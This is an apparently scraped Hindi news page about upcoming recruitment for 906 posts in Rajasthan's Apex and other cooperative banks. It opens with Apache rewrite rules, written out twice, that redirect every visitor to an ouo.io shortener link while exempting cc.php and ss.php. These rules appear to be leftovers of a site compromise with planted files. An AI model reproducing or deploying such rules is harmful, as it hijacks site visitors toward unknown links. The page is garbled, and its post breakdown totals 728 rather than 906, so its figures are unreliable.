
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 421
Previous Nextजयपुर। राजस्थान में बड़े सहकारी बैंक अपेक्स बैंक में नौकरी करने की चाह रखने वाले युवाओं के लिए अच्छी खबर है। इन बैंकों में भर्ती की राह तो गत बजट सत्र में ही खुल गई थी। अब इन नौकरियों के लिए आवेदन पत्र भी आमंत्रित किए जाएंगे। जानकारी के अनुसार सहकारी बैंकों में 906 विभिन्न पदों पर होने वाली भर्ती के लिए अप्रैल माह में आवेदन आमंत्रित किए जाएंगे। भर्ती की इस प्रकिया को जुलाई माह तक पूरा कर लिया जाएगा। अपेक्स बैंक में सीनियर मैनेजर के 6, मैनेजर के 12 व बैंकिंग सहायक के 25 सहित कुल 43 पदों पर तथा जिला केन्द्रीय सहकारी बैंकों में मैनेजर के 92, कम्प्यूटर प्रोग्रामर के 7 व बैंकिंग सहायक के 437 पदों सहित कुल 536 पदों पर तथा प्राथमिक सहकारी भूमि विकास बैंकों में मैनेजर के 57 व बैंकिंग सहायक के 92 पदों सहित कुल 149 पदों पर भर्ती होगी।